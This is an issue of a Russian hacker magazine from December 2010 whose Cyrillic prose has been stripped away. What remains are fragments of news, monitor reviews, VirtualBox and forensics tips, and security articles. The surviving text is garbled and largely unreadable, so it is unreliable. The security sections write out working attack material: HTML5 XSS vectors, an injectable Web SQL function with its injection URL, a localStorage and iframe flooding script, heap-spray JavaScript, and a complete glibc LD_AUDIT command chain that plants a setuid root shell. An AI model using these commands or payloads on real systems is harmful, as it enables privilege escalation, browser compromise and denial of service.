
x 12 (143) 2010

.
210
:

DIGITAL FORENSIC: . 34

12 (143) 2010

0day / ,

WINDOWS
. 48

,
?
C. 62

143

HTML5
VIRTUALBOX TIPSNTRICKS
.NET
WIN32.WHISTLER


OBJECTIVE-C

MAC OS X IPHONE
. 96

INTRO

,

$4k .

,
,
.
: ,
,

. , ,
, CMS , 3ds Max ,
/ :).


. :
HDD , Windows 7

1 45 . SSD .
200 /
29 : 4 , !

, ,

. SSD

nikitozz, . .
udalite.livejournal.com
http://vkontakte.ru/club10933209

-, , :
. SSD upgrade-.
:).

CONTENT
MegaNews

004

076

080

PC_ZONE

086

022

HTML5

090

028

VirtualBox Tips'n'Tricks

032

096

X-!

034

102

.NET

106

110

FERRUM
016

HTTP-


forensic-

038

044

Easy-Hack

048

Windows

054

WFP

058

062

ZDI

066

X-Tools

Trojan-Clicker.Win32.Whistler
-

072

DE

Linux

Mac OS Objective-C

.NET-

QR-

114

120

Master of puppets

126


Windows Server 2008


Puppet

MALWARE
068

:
Linux Mint 9 vs Calculate Linux Desktop 10.9

SYN/ACK

Kernel Pool Overflow

Windows Filtering Platform

, ,

132

MegaFAQ mindFUCK'

140

FAQ UNITED

143

144

WWW2

FAQ

8,5

068

Trojan-Clicker.Win32.Whistler
-

058

Trojan
-Cl

icker.Win32.

096

062

X-!

Mac OS
Objective-C

ZDI

>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>

Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
, MALWARE SYN/ACK
Dr. Klouniz
(alexander@real.xakep.ru)
UNIXOID PSYCHO
Andrushock
(andrushock@real.xakep.ru)
>

> xakep.ru
(xa@real.xakep.ru)

/ART

>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)

/DVD

>
Step
(step@real.xakep.ru)

> Unix-
Ant
>

/PUBLISHING
>
, 119021, , .
, . 11, . 44-45
.: +7 (495) 935-7034
: +7 (495) 780-8824
>PR-

/ .: (495) 935-7034, : (495) 780-8824


> GAMES & DIGITAL
>




> MAN TV

(rumyantseva@gameland.ru)
>
( )
(strekneva@gameland.ru)
>

>


>
(ashomko@gameland.ru)
> -
(alekseeva@gameland.ru)

>

(korenfeld@gameland.ru)
>


/:

/ .: (495) 935-4034, : (495) 780-8824


>
(kosheleva@gameland.ru)
>

(goncharova@gameland.ru)
>
(lukicheva@gameland.ru)

> :

,
: claim@gameland.ru.
>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,

,

77-11802 14
2002 .

Lietuvas Rivas, .
115 479 .
.

. :

. ,

,
.
.


.
.

:
content@gameland.ru
, , 2010

MEGANEWS

Mifrill mifrill@real.xakep.ru


!
,

, , . , , .
Android- HTC Desire Z
(G2) T-Mobile
, .

.
Android.

, :
,
unionfs.

,
.
, ,

Android. ,
HTC
T-Mobile, , ,
.

$12000 Mozilla 12-


Firefox.
10 .

JPEG,
Google . -,
WebP (.webp), JPEG. ,
, JPEG , , . WebP Google.
, RIFF , VP8 ( Google).
.
, WebP-
. Google, WebP-
39,8% , JPEG,
! , 65%
. 90% JPEG
. ,
Google .
. ,
WebP 8 ,
JPEG.

004

X 12 /143/ 10


24
Samsung.
SyncMaster
FX2490HD. 24- LED-
- . ,
, - ,
, , .
MEGA DCR, FullHD- (1080p)
ConnectShare, , , .
, , mp3- USB-
! : 250 /2, 1920x1080, 5 .
FX2490HD: ( , Samsung ). -

. 18 990 .

Ceatec TDK
1 . 16
, 32 .



,
.
-, :
(dolboeb), (mrparker)

(ottenki-serogo),
.
-
,

.
www.digital.ru/digital-university.

.
, Dev-Team ,
Apple A4
bootrom ,

006

iPhone/iPad .
,
iOS 4.1
, . ,
bootrom (read-only),
. Apple, ,
.
Dev-Team .
aka geohot.
PlayStation 3 Apple. ,
-

, Dev-Team,
iOS 4.0
4.1 limera1n. , limera1n
bootrom, .
-, geohot
.
- , geohot
. , Apple
,
! :
, Apple
, geohot,
, Apple
.

LED LG
LG , E50VR,
: E2250VR E2350VR ( 21.5 23
). LED-
E50: ( 17,5 ), , , Smart+ (Auto Bright, Dual Web, Cinema Mode
Original Ratio). E50VR :
, SUPER+ Resolution.
, . SUPER+ Resolution
, , , ,
. LG , PSP NINTENDO DS ,
( ) .
1920*1080, 250 /2, 5000000:1, 5 .
8200 . E2250VR 8600 . E2350VR.

:
600 000 .


GOOGLE

-,
, .

Google. , Google
Toyota Prius,
. -
140 000 !
, ,
GPS-
, ,
. , , :
,

,
,
. ,
. Google
, ,
,
.
-
, :
-
. Google ,

. ,
.

Internet Explorer .
IE
50%. 2 67%. ,
?



. Hexbug (www.
hexbug.ru), . , , ,
,
( :)),
. , , , , , ,
.
, , Hexbug . ?
, .
AG13. , , .

008


SDD
CEATEC 2010,
, Hitachi-LG

,
2011 .
HyDrive, , SSD .
Hitachi-LG ,
. HyDrive

32 64 -, ,
256 .
SATA 6 /, Blu-Ray- SATA
USB 3.0.
, ,

, .
, , , .

Microsoft : ,
;
2,2 . , MS,
200 000 .

36


(
)? .
, , ,
.
, Digital
Vote by Mail, 300 .

.

,
, ,
36 ! ,
- ,
,
PDF-.

Hail to the Victors
.
,

.
... ,

. PDF-
.pdf
. ,


GnuPG . ,

.

,
.
,
.
,
- !
, , ,
,
, ,
, .
: $300 000!

GPU


, ,
,

(GPU). , CUDA,

,
, .

010

,
. , GPU
, , ,
. ,
GPU

( -

, ,
). , CUDA
,
x86 (
)

GPU. Malware 2010,
whitepaper (http://bit.ly/
GPUMalware), PoC.

CPP , 40 000
Wi-Fi- 25% , 25%
.

WINDOWS PHONE 7
,
, Microsoft
:).
Windows Mobile
,
. Microsoft ,
WM ,
.
, , Windows Phone 7, ,
. WP7
, . ,
WP7 Windows Embedded CE 6.0,
Microsoft Xbox Live, Zune
Bing. Windows Phone 7 :
,
(Live Tiles). , -,
,
, . (Hubs),
. ,
, , : ,
, , +, Marketplace. : ,

WP7 -
. -! , Microsoft
,
. , - Angry Birds,
iOS Android. -,

.. , . WP7
Tombstoning (push-).
, -
. , .
.
Adobe Flash, ; Silverlight.
, , copy-paste (
iOS). :
HTC, LG, Samsung, Dell Toshiba.
. , , : ( ) 800x480 320x480,
1 , 256 8 -, DirectX 9, GPS-, ,
, FM-, 5 .

TeleGeography : 2010
- 62%.

BLACKBERRY
BlackBerry-
, , .
RIM BlackBerry
,

. RIM
BlackBerry ... , ,
Elcomsoft
BlackBerry,
, .
BlackBerry Desktop Software,
256- AES. , , ,

012

,
, ,
, , SMS-,
. Elcomsoft
Elcomsoft Phone Password
Breaker,
Apple
iPhone iPod Touch.
BlackBerry. , ,
BlackBerry (
) ,
,
.
, RIM
:).

?
!
, ,
, .
: ,
- Microsoft. , , , (15
9 146 ). ,
53 .
? ,
. ,
, . , . -

-. , ,
. , ,
upload .

,



(
Ubuntu
Windows). .
: ,
- .
, ,
. , ,
.

PandaLabs ,
57 000 URL-.


ENLARGE YOUR PENIS:


MICROSOFT

.
Canadian Health & Care Mall,
, ,
,

Microsoft. ,
,
, , Canadian
Health & Care Mall.

1025
, seizemed.com,
yourrulers.com crashcoursecomputing.com,
,
Microsoft
(DIG ,
131.107.202.197 131.107.202.198).
DNS-, ,
.
Microsoft .
,

, ,
.
, ,

.

HD-
, , .
, , -

,
.
, (
), -

,
. , , ,
. AMIMON,
,
(81,3x29,9x15,5 )
AMIMON WHDI (Wireless Home Digital
Interface) Stick. ,

1080p 60 ,
1 !

WHDI Stick /
.
HDMI-
USB. ,
, , WHDI
. AMIMON

. ,
WHDI Stick , .

Net Applications
Windows XP, 60,03%.
: Windows 7 17,1%, Apple Mac OS X 5,03%, Apple iOS 1,18%
Linux 0,85%.

X 09 /140/ 10

015

FERRUM

ACER B233HU
BENQ V2220
LG E2350V
SAMSUNG BX2240 LED


20 . ?
, ,
.
,
.

.
, ,
. ,
. TN, MVA IPS.
,
. - TN.
? . , . ,
, , . , - , . , ,
, ,
. , , , ,
. TN-
, (
) .
, ,
. .
TN-, ,
IPS. , , ,
.

016

IPS- -,
24- RGB-.
, , , 178.
, 180 , . IPS,
TN, ,
. ,
.
MVA PVA.
, .
.
4 TN-:
, ,
, .
: .


.
.

.
. , .
, .

5800 .

9890 .

Acer
B233HU

BenQ
V2220H

: 23"
: TN
: 16:9
: 2048X1152
: 300 /2
: 80000:1
: 5
(./.): 160/160 (CR?10)
: D-SUB, DVI, HDMI, USB
: 2 1
: 544X385X234
: 7,8

: 21,5"
: TN (LED-)
: 16:9
: 1920X1080
: 250 /2
: 10000000:1
: 5
(./.): 170/160 (CR?10)
: D-SUB, DVI, HDMI
: : 523X394X171
: 3,3

,
Acer B233HU . ,
-, ,
,
(
, -). ,
;
, . , Acer B233HU
, FullHD 2048x1152 .
: D-Sub,
DVI, HDMI USB-.

BenQ V2220H ,
.
, , .
:
, LED-.
,
. ,
. ,
, , ,
BenQ V2220H .

, Acer B233HU ,
. -,
, . -,
.

, .
, (
VGA), .


7950 .

6900 .

Samsung
BX2240 LED

LG
E2350V

: 21.5"
: TN (LED-)
: 16:9
: 19201080
: 250 /2
: MEGA DCR (1000:1 )
: 5
(./.): 170/160 (CR?10)
: D-SUB, DVI
: : 513X341X190
: 4,2

: 23"
: TN (LED-)
: 16:9
: 1920X1080
: 250 /2
: 5000000:1
: 5
(./.): 170/160 (CR?10)
: D-SUB, DVI
: : 560X428X198
: 3,3

. , ,
. ,
,
.
LED-,
. , , , , , .

, . .

018

- ,
, . , LG E2350V, . .
,
, LED- .
: , ,
,

.

LG E2350V
. . -,
, , . -, , .

LG E2350V

Samsung BX2240 LED

BenQ V2220

Acer B233HU

LG E2350V,
, -

020

. ,
, BENQ V2220H

. z


PC_ZONE
oxdef oxdef.info; Invent

HTML
5


HTML5:


HTML5 .
,
-.
, ,
.
HTML5,
,
. , ,
, . ,
,
.

HTML5:

HTML5,
, . ,
, . <video>

022

, , , Adobe Flash. HTML5, . , , Youtube Vimeo,


. Apple,
Flash , , ,
. , <video> , .
, HTML5, :
- : -,
;
Canvas 2D API;

Chromium ( Google Chrome)


,
HTML5

(Cross Domain Messaging);


Drag-and-drop-;
-;
(Geolocation).

PDF- HTML5
DVD-. , ,
.

, -
(, , Gmail) -.
- .
Google Google
Gears. ( 4 )
.
, , .
WebStorage. , HTML5
(, ) - JavaScript:
localStorage ;
sessionStorage .
-:
Firefox 3.5, Safari 4.0, IE8, Google Chrome, Opera 10.50.
-
-.
<p> <span id="count">- </span> .</p>
<script>
  // localStorage stores values as strings, so convert before incrementing
  if (!localStorage.pageLoadCount)
    localStorage.pageLoadCount = 0;
  localStorage.pageLoadCount = parseInt(localStorage.pageLoadCount, 10) + 1;
  document.getElementById('count').textContent = localStorage.pageLoadCount;
</script>

.
JS, API HTML5 HTML5 Origin,

(, http://example.com:80).
, - 4
5 .
Firefox, Safari, Opera, Google Chrome 5 , IE 10 .

Cross Domain Messaging

, , .
, Firefox .example.com. ,
( !) , :
// Firefox 3.6.8
for (var i = 0; i < 100; i++) {
  try {
    localStorage.setItem(rand(1, 10000).toString() + 'foo' + i.toString(),
                         'AA...AA' + i.toString());
  }
  catch (e) {
    alert(i.toString() + '|' + e);
    break;
  }
}

null-. -
null- localStorage
Firefox. , 1 , -
. , .
. Google Chrome , .
Google Chrome **
, wildcard, 5 !
<script>
for (var i = 0; i < 10; i++) {
  var iframe = document.createElement('iframe');
  iframe.src = 'http://' + randomString() + '.example.com/ddos.html';
  document.body.appendChild(iframe);
}
</script>

. , , :
- ;
- DNS- .
- (++)
, example.
com/~user/, , , . ,
, !
-

023



RFC

, HTTP. -
JS API. ,
- -, XSS.
, ,
5 ! , ,
JavaScript
HTTPOnly, . WebStorage , .

SQL- -

,
-SQL- !
SQLite, !
, , ID:
function showById() {
  var pos = document.URL.indexOf("book=") + 5;
  var bookId = document.URL.substring(pos, document.URL.length);
  var author = '';
  var title = '';
  db.transaction(function(tx) {
    tx.executeSql("SELECT * FROM books WHERE id = " + bookId, [],
      function(tx, result) {
        if (result.rows.length > 0) {
          document.getElementById('bookAuthor').textContent = result.rows.item(0)['author'];
          document.getElementById('bookTitle').textContent = result.rows.item(0)['title'];
        }
      }, function(tx, error) {});
  });
}

, ?
http://target.com/html5/websql.html?book=1/**/AND/**/1=2

024

Chromium

DOMXSS+SQL-! , (, Oxod
SQLite, WWW-).
, Opera, Chrome
SQLite- . ,
SQL-. , . , -SQL-
, localStorage sessionStorage.

: IDS WAF

HTML5 , ,
/ WAF (
-
][ 10.2009). autofocus. ,
JavaScript . , HTML5, ,
.
:
<input onfocus=alert(1) autofocus>
<input onblur=write(1) autofocus><input autofocus>

, ,
. <video>, ,

HTTP://WWW
links


JavaScript- ( :)) poster:
<video poster=javascript:alert(1)//
<video><source onerror="javascript:alert(1)">

<video>
-.
Metasploit Decloak (www.decloak.net).
c .
, , JavaScript
onscroll- <BODY>
autofocus?
<body onscroll=alert(1)><br><br><br>...<br><input autofocus>

, ,
:
<form id="test" /><button form="test" formaction="javascript:alert(1)">X

, HTML5
-

: datetime, datetime-local, date,
month, time, week, number, range, email, url, search, tel,
color.
. , date ,
JavaScript.
-. ,


.
<style>
[required] {
background-color: green;
}
:invalid {
background-color: red;
}
</style>

<input name="email" type="email"/>

, ,
!
,
RFC ( , ,
pattern) JavaScript
. ,
! , ,
,
. -, ,
.
AJAX- . :
,
!

C
HTML5:
www.html5rocks.com

HTML:
dev.w3.org/html5/
spec
HTML5 Security
Cheatsheet:
heideri.ch/jso
HTML 5 Security
by Frank Ruske:
www.slideshare.net/
mayflowergmbh/
html-5-security
Dive into HTML5
by Mark Pilgrim:
diveintohtml5.org
,
:
SQLite
Oxod:
www.xakep.ru/
post/53551/default.
asp

WARNING

info
.

,

.

Cross-document messaging

- ( )
-,

025


. , ,
. , . ( )
, ,
Firefox, Google Chrome.
, . (,
) example.com/index.html
foo.com/iframe.html, .
foo.com .
foo.com:
<div id="msg">...</div>
<script>
window.addEventListener('message', receiver, false);
function receiver(e) {
  if (e.origin != 'http://example.com') {
    return;
  }
  document.getElementById('msg').innerHTML =
    'Origin: ' + e.origin + ' From: ' + e.source + ' Data: ' + e.data;
}
</script>

(e.origin).

, ,
, XSS. ( ) a.example.com
:
<script>
function postMsg() {
  var o = document.getElementById('ifra');
  o.contentWindow.postMessage(document.getElementById('msg').value, 'http://foo.com/');
  return false;
}
</script>


targetOrigin. , *
. IMHO, .
, .
.
,
DOM-based XSS.


(), .
Security and privacy considerations W3.

026

, , .

navigator.geolocation:

if (navigator.geolocation) {
  navigator.geolocation.getCurrentPosition(function(position) {
    var lat = position.coords.latitude;
    var lng = position.coords.longitude;
    var options = { position: new google.maps.LatLng(lat, lng) };
    var marker = new google.maps.Marker(options);
    marker.setMap(map);
  });
}

( MS Internet Explorer,
Geolocation API ) , ,
.
/
. , ,

- IP-,
, , (,
, Google,
),
(www.mozilla.com/ru/firefox/geolocation). ,
-, , (Google Chrome, Firefox,
Opera)?! , Google Location Services! , , , :
Mozilla, Google
Google Location Services
.
- , ! :)
, XSS .

,
- HTML5,
Security . ,
,
W3AF, -.
,
WebStorage
.
,
HTML5 :).z

PC_ZONE
Step www.twitter.com/stepah

VirtualBox
Tips'n'Tricks



Linux VirtualBox,
, .
,
.
,
. .
VirtualBox ,
. , ,
, , :
. API, ,
, ,
. VirtualBox,
.

1.
RDP

, .
,
VirtualBox
, RDP (Remote Desktop
Protocol). :
mstsc , , FreeRDP (www.freerdp.com).

028

,
,

. , ,
IP- .
mstsc.
rdesktop,
:
rdesktop host_system_ip:port. RDP

.
3389 ( ,
RDP ),
3390 .. ,
. .

,
. .

VirtualBox'

RDP-

, , RPD-
RC4 128-
, 4096 .

RDP-. phpVirtualBox, , RDP Web Control . -


,
. !

2. -

,
.
, ,
( ) ,
RDP . ,
HTTP , . - -
VirtualBox Web Console
(code.google.com/p/vboxweb).
,
phpVirtualBox (code.google.com/p/phpvirtualbox). ,
VirtualBox,
PHP AJAX. , ,
, phpVirtualBox
. .
1. phpVirtualBox
vboxwebsrv ( VirtualBox).
, , /usr/bin.
VirtualBox, , ,
C:\Program Files\Oracle\VirtualBox. : , VirtualBox.
,
.
"C:\Program Files\Oracle\VirtualBox\vboxwebsrv.exe" >nul

2. - PHP. , XAMP XAMPPLite (www.apachefriends.org).


phpVirtualBox htdocs.
3.
VirtualBox config.php, $username, $password, $location.
. (http://<ip-
>:<>) , .
VirtualBox SDK , RDP-,
Flash. RDP Web Control
,

3. !

,
. . , VirtualBox
GUI-.
VBoxManage.exe
. VBoxManage list vms
, UUID:
Oracle VM VirtualBox Command Line Management
Interface Version 3.2.10
(C) 2005-2010 Oracle Corporation
All rights reserved.
"MacOS" {5f74df26-8f93-4f18-b120-da107a5e0a9c}
"macox" {8385d552-b41e-4ffd-add0-3b8795e53f46}
"ubuntu" {09e0b578-3668-4492-92d2-7fa5fb21c911}
"vista" {27b526c2-6bca-4cfe-ace8-703b803670a8}
"xp" {521f3a25-68c7-44e7-a28f-0c60ee87295e}

? :
,
VBoxManage.exe startvm xp.
, ,
. , GUI-,

VBoxManage. SDK ,
VirtualBox
. API
.
, : ( )
Java, Python .
SDK vboxshell.py, API
.
,
, ISO-

029


- phpVirtualBox AJAX

CD/DVD-,
..
, API VirtualBox. -
(, )
API VMware . API
VirtualBox ,
VMware.

, VirtualBox .
, P2V (Physical-to-Virtual).
Linux, Windows
. ,
. , , ,

BSOD. .
VirtualBox P2V-, . , :
1. MergeIDE
(http://bit.ly/Merge_IDE). - Windows , IDE/ATA- , , ( ,
, ). ,
, ,
BAT- MergeIDE.
2. .
. LiveCD
. dd.
3. VDI-,
VirtualBox. VBoxManage:

4.

VirtualBox ,
. .
: VirtualBox Host-Only Ethernet
Adapter , . ,
, . ,
pcap-. ,

( , ),
VirtualBox,
,
. :

VBoxManage convertfromraw ImageFile.dd OutputFile.vdi


VBoxManage modifyvm [your-vm] --nictrace[adapter-number] on --nictracefile[adapter-number] file.pcap
VirtualBox -startvm [your-vm]

, :
VBoxManage modifyvm "ubuntu" --nictrace1 on --nictracefile1 file.pcap
VirtualBox -startvm "ubuntu"

file.pcap ,
, , Wireshark.
,
pcap- (
- ).

5. Windows-

030

, VirtualBox
( <Ctrl+D>).
4.
:).
VDI-.
IO
APIC.
5. . :
, BSOD.
, Guest Editions .
6. Windows. , ,
repair.
.

6. DualBoot

, ?

MergeIDE

VirtualBox


,
.
? ! ,
,
. VirtualBox
raw hard disk access
,
. , , :). ,
. , raw hard disk access?
( ,
)
VMDK.
, ,
. :
,
.
:
VBoxManage internalcommands createrawvmdk -filename /path/to/file.vmdk -rawdisk \\.\PhysicalDrive0 -register

. , , , , /dev/sda.
,
.

. VMDK- :
VBoxManage storageattach WindowsXP --storagectl "IDE Controller" --port 0 --device 0 --type hdd --medium /path/to/file.vmdk

,
.
.
, ,
.
VirtualBox: Windows XP (http://
bit.ly/dualbox_xp) Windows 7 (http://bit.ly/dualboot_w7).
.

7. Wi-Fi

,
Linux, -
Wi-Fi-. ,
,
.
,
aircrack kismeta,
, . , ,
VirtualBox
USB- . ,
$20 USB Wi-Fi- (
) ,
, . ,
/
(
Windows). USB,
.

USB . ,
.
Backtrack aircrack , . - Linux.
. VirtualBox,
, .
Portable- www.vbox.
me.z

INFO

info
,
Mac OS X,


MacOS X + VirtualBox
=
][ 08.2010. PDF .

DVD
dvd

VirtualBox,

DVD-.

031

PC_ZONE
Step twitter.com/stepah


HTTP-
Chaos
Construction
.
, Wi-Fi- HTTP-.
- Twitter ,
. HTTP session hijacking .
,
,
-. . ,
,

. ,
,
, -,
,
? , , :
,
. ?
HTTP - .
WifiZoo. Python
Scapy
.
,
,
HTTP-. -.

Linux, Python
Kismet. ,
.
,

HTTP-, Hamster
Sidejacking Tool sessionthief.
. -
,
cookie .
,

.
,
,

032

.

,
.
Firefox Firesheep
(codebutler.com/firesheep) security- Toorcon 12.
,

Start Capturing. -
,
Firesheep , .
, .
,
Firesheep, . .
,
, ,
.
-, .

! ,
. , ,
( Websites).

JS-, ,

,
.

,
Twitter, Dropbox, Google,
,
.


, .

: ?. : HTTPS-!
, , Gmail.
, . .
Firefox
ForceTLS, HTTPS,
. HTTPS Everywhere
,
HTTPS
.
VPN-
Tor,
,
.
, WPA2,

, . z

session hijacking


PC_ZONE


forensic-
? ,
, .
,
.
digital forensic,
, ,
, ,
.. ?
forensic . ,
,
- . ,
forensic
. ,
. , .
.

.
- ,

034

. ,
A4 ,
,
, , ,

. .
SSL-
- . Documents and Settings\
user\Local Settings\History\ Documents and Settings\user\Local
Settings\Temporary Internet Files.
. Chrome ChromeAnalysis
(forensic-software.co.uk/chromeanalysis.aspx).

Web Historian

Google Chrome

, , , , , .. , ,
.
Firefox FoxAnalysis
(forensic-software.co.uk/foxanalysis.aspx). ,
Firefox, , . Web Historian (www.mandiant.com),
Firefox 2/3+, Chrome 3+, Safari 3+ Internet
Explorer 8 . ,
, . ,
(, PDF). Website Analyzer Website Profiler. history-,
, . Website
Profiler , : ,
, , , ..
SQLite- , .

.
,
, . ( )
, ,
. Digital Detective (www.digitaldetective.co.uk) ,
,
( crash-, ),
,
, ..
HstEx ( ) ,

, ! ( ).
- , , HstEx
.

forensic-
. (
raw disk image) dd, .

EnCase
forensic


The Sleuth Kit ( ). ,
,

. TSK , , , ,
, ,
, . TSK , . , TSK
,
. FAT, NTFS, Ext2/3, UFS,
, , NTFS.
,
.
TSK .
,
, .
Autopsy Forensic Browser The Sleuth. GUI-
TSK,

035


Forensic Toolkit

GUI- TSK
, .. PTK (ptk.dflabs.com/ru/index.
php). , . ,
.
MySQL-, . MySQL : PTK
- AJAX-.

, , ,
( ), .
, , Safeback
(forensics-intl.com/safeback.html).
, (
SCSI-). ,
-, , ,
. forensic The Forensic Toolkit Imager (FTK Imager).
,
.
P2 eXplorer (www.paraben.com/p2-explorer-pro.html).

,
. ,
forensic- .
, ,
.
: EnCase, SafeBackm, WinImage
Linux DD, VMware
VirtualPC.
(,
, ),
.
.
R-Studio (www.r-studio.com), -

036

.
, , Scalpel (www.digitalforensicssolutions.
com/Scalpel). ,
.

. FATx, NTFS, ext2/3,
(raw) .

-
. -
forensic- Encase.
, ,
.
FastBlok,

. Encase (LEF
E01) ,
forensic- (
P2 eXplorer).

, .
, , , ( Outlook) , Encase, .
,
GREP. EnScript
. ,

.
Encase - . ;
Forensic Toolkit (www.
accessdata.com). FTK
. Encase
.
,
, FTK xls-
.
,
. PST-
Outlook FTK ,

WinTaylor
LiveCD
, , ,
. ,
.
: cc, tan, pass.

-,
,
live- .
,
Windows- ,
. ,
,
,
WinTaylor (www.caine-live.net).
ActiveX-, ,
, ,
Windows Forensic Toolchest Nigilant32,

WinTaylor.
.
, - ? USBDeview,
.
Memoryze WinTaylor,
.
, , .
, .
Memoryze: ,
( DLL, EXE, ),
,
(
, ..).
, LiveCD-,
forensic-,
Linux. CAINE (Computer Aided
INvestigative Environment)
.
Orion Live CD (sourceforge.net/
projects/orionlivecd).


Forensic

, Forensic

.
, , , .
, .
The Cellebrite
UFED Physical Pro ( Mobile Phone
Examiner), 3000
, GPS-.
? .
, SMS .
forensic-

, , SIM- , ,
. ,

, UFED ,
Android iPhone.
,
hex-. z

HTTP://WWW
links

digital
forensic:
blogs.sans.org/
computer-forensics

DVD
dvd


forensic. ,



.

037


, Digital Security a.sintsov@dsec.ru

01


LINUX

CVE

CVE-2010-3856
CVE-2010-3847
TARGETS

Fedora 13
Red Hat 5
CentOS 5
Ubuntu 8/9/10
Debian 5
BRIEF


Microsoft, , , ,
. GNU LIBC,

Linux.
- (Tavis Ormandy)
,
setuid-. . ,
(4 ), , ,
,
setuid-.
, , ,
,
.

$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping

, . libpcprofile.so ,
. libc,
root. LD_AUDIT
ld.so setuid- ping.
libpcprofile.so. , ld.so
dlopen(), ,
PCPROFILE_OUTPUT, ,
-. ,
exploit /etc/cron.d.
. ping setuid-,
exploit ...
, umask(0)
rw-rw-rw; ,
, .
$ printf "* * * * * root cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit\n" > \
/etc/cron.d/exploit


setuid.
.
.
$ /tmp/exploit
# whoami
root

EXPLOIT

,
(CVE-2010-3856), Ubuntu, :).
, ; ,
: exploit-db.com/
exploits/15274/. , ,
*nix-.
$ umask 0

.
0, ,
rw-rw-rw-, rwxrwxrwx.
.

038

SOLUTION

Linux- OpenWall,
, , ,
. , , ,
Debian Ubuntu ; ,
.

02

.NET

CVE

CVE-2010-3332

Ubuntu

, .NET, .
. , - viewstate,
.
.NET ,
DotNetNuke. CMS
.
EXPLOIT

Tavis Ormandy Google Security Team


TARGETS

Microsoft .NET Framework 1.1-4.0


BRIEF

Microsoft.
.NET Framework. Ekoparty 2010 (Thai Duong)
(Juliano Rizzo), , ,

,
,
. (),
.NET WebResource.
axd ScriptResource.axd. d
.
, , , , HTTP-. ,
, , . ,
,
. , , ,
.
, ;
(3DES/AES), ( ) 8
16 . 8 16 (
), .
+--------------------------------+
| C| h| y| p| h| e| r| t| e| x| t|
+--------------------------------+
|01|02|03|04|05|06|07|08|09|10|11|
+--------------------------------+

039

DIR. rscL- , EAX

8 .
+-----------------------+-----------------------+
|        BLOCK 1        |        BLOCK 2        |
+-----------------------+-----------------------+
| C| h| y| p| h| e| r| t| e| x| t|05|05|05|05|05|
+-----------------------+-----------------------+
|01|02|03|04|05|06|07|08|09|10|11|12|13|14|15|16|
+-----------------------+-----------------------+

8 ,
. .

. CBC.
IV -
C(0) = IV
C(i) = E( P(i) xor C(i-1) )

(0), .
, .

. :
IV

C(0) = IV
P(i) = D( C(i) ) xor C(i-1)
     = P(i) xor C(i-1) xor C(i-1)
     = P(i)

, , ,
(30
). , ,
.
CBC-R. XOR
, . ASP .NET
web.config ( ).
-,
.
, IV,
XOR IV , .
CBC-. , : gdssecurity.
com/l/b/2010/09/14/automated-padding-oracle-attacks-withpadbuster/. , ,
: POET, padBuster.pl ..
SOLUTION

Microsoft .
. , 500
.
,
:).

03


ADOBE SHOCKWAVE

CVE

N/A

Adobe Shockwave.

TARGETS

Shockwave Player 11.5.8.612


BRIEF

- Abysssec 0day
Adobe Shockwave. , . , , , Flash Acrobat
Reader, . ,
, .
EXPLOIT

DIR. RIFF -. \x57\x46\x49\x52 XFIR .


; ,
, . : tSAC, pami,rcsL.
rcsL-.
, Shockwave .
, rcsL-
EAX, :

Adobe Shockwave.

0x68122A42  mov  eax, [esp+18h+arg_4]          ; EAX DIR
0x68122A42  mov  edx, [esi+28]
0x68122A42  mov  [esi+0A4], eax
0x68122A42  mov  dword ptr [esi+20], 80000001
0x68122A42  mov  ecx, [edx]
0x68122A42  lea  eax, [eax+eax*2]              ; ,

041

Stuxnet :). ESET

0x68122A42  push esi
0x68122A42  call dword ptr [ecx+eax*8+20]      ;

, ,
HeapSpray. ,
ecx+eax*8+20 NOP-
(HeapSpray , ). call
, NOP- NOP, .
NOP-
0x0A0A0A0A. CALL
, 0x0A0A or
"cl, dword ptr [edx]".
.
SOLUTION

0day
Adobe Shockwave.

04

CVE

CVE-2010-2729
TARGETS

Windows XP
Windows 2003
Windows 2008
Windows 7
BRIEF
Stuxnet 0day. ,
, .
Windows,
.

:
typedef struct _DOC_INFO_1 {
    wchar_t* pDocName;
    wchar_t* pOutputFile;
    wchar_t* pDatatype;
} DOC_INFO_1;

( ),
pOutputFile.
, ,
,
.exe .
.exe- :
DWORD RpcWritePrinter(
    [in] PRINTER_HANDLE hPrinter,
    [in] BYTE* pBuf,
    [in] DWORD cbBuf,
    [out] DWORD* pcWritten
);

,
.exe-
(%SystemRoot%\system32). , .exe-.
Metasploit
(HD Moore) NetrJobAdd,
system32
. . , , Metasploit.
SOLUTION

Microsoft (
0day, Stuxnet,
). , .z

EXPLOIT

,
,
.
( ),
.
RPC. RpcStartDocPrinter,
, - :
DWORD RpcStartDocPrinter(
    [in] PRINTER_HANDLE hPrinter,
    [in] DOC_INFO_CONTAINER* pDocInfoContainer,
    [out] DWORD* pJobId
);

042
42

STUXNET
,
Windows.
, Conficker. 0day. LNK-
, ,
ESET (eset.com/
resources/white-papers/Stuxnet_Under_the_Microscope.pdf).
- win32.sys . ,
SCADA Siemens, .


GreenDog agrrrdog@gmail.com)

Easy Hack
1

:
WINDOWS

:
, client-side- , .
, , , , , Windows.
, PSI Secunia (secunia.com/vulnerability_scanning/
personal/).

. ,
, .
, , ActiveX.
Secunia : , ( ). :

: HEAPSPRAY
INTERNET EXPLORER 8

:
, Explorer 8,
.
, ,
. ,
, NOP .
, . 100%
, 0x0d0d0d0d,
, , NOP-sled,
. , ,
JavaScript-:
//Shellcode :
var shell = unescape("-_");
//NOP:
var bigbk=unescape("%u9090%u9090%u9090%u9090");
while(bigbk.length<0x50000) bigbk=bigbk+bigbk;


. :
, .

var mem=new Array();


for(i=0; i<400;i++) {mem[i]=bigbk+shell;}

Internet Explorer 8 JS.


JIT-spray Flash, Java, .NET-,

.
Dave Aitel IMMUNITY ,
IE8. :
//
var h1=new Array();
h1[0] = bigbk + shell;
for (var i = 1 ; i < 300 ; i++) {
  h1[i] = h1[0].substring(0,h1[0].length );
}

:).
, .
- .

//

3
044

:
. 10
(Nessus, Retina, Xspider, etc.) , .

- ,
. -, :).
, .
,
. ,
.
:
Nessus .
, :).
. , ,
.
. -
.
, .
. ,
, Nessus (tenable.com/nessus/).
,
(, :)). Nessus - . .
:

1) ;
2) Nessus Server Manager ,
;
3) ;
4) https://localhost:8834/.


(policies), (scans). Reports.
, .
, .
, .
, -,
:).

:
, - . , .
, ;
spider ; , CMS .
.
- ,
.
- ,
. ,
,
.
, -
, -, ( , ).
.
:).
,
, .
